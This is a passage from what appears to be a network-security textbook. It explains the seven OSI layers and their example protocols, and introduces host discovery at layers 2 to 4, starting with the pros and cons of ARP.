Organization for Standardization (ISO) standard that defines how networked systems
communicate. This model is divided into seven layers that define how application content can
be sent by one system and/or received by another. The upper layers of the OSI model tend to
be more visible to the end user, whereas the lower layers operate transparently to most casual
users. These layers consist of the following:
OSI model Layer description Protocols
Layer 7 – Application This layer involves the application software that
is sending and receiving data
HTTP, FTP,
and Telnet
Layer 6 – Presentation This layer defines how data is formatted
or organized
ASCII, JPEG, PDF,
PNG, and DOCX
Layer 5 – Session This layer involves application session control,
management, synchronization,
and termination
NetBIOS, PPTP,
RPC, and SOCKS
Layer 4 – Transport This layer involves end-to-end
communication services
TCP and UDP
Layer 3 – Network This layer involves logical system addressing IPv4, IPv6, ICMP,
and IPSec
Layer 2 – Data link This layer involves physical system addressing ARP
Layer 1 – Physical This layer involves the data stream that is
passed over the wire
The lower layers of the OSI model are largely used to ensure that network traffic successfully
arrives at its intended destination. Many of the commonly used protocols at these lower
layers necessitate a response from the destination system and, as such, can be leveraged
by potential attackers to identify live systems. Techniques discussed in the remainder of this
section will leverage layers 2, 3 and 4 protocols to discover live network systems. Prior to
addressing each of the specific recipes, we will briefly discuss the protocols used and how
they can be leveraged for discovery.
The pros and cons of layer 2 discovery with ARP are as follows:
***Pros:
‰‰ Very fast
‰‰ Highly reliable
***Cons:
‰‰ Cannot discover remote systems (non-routable protocol)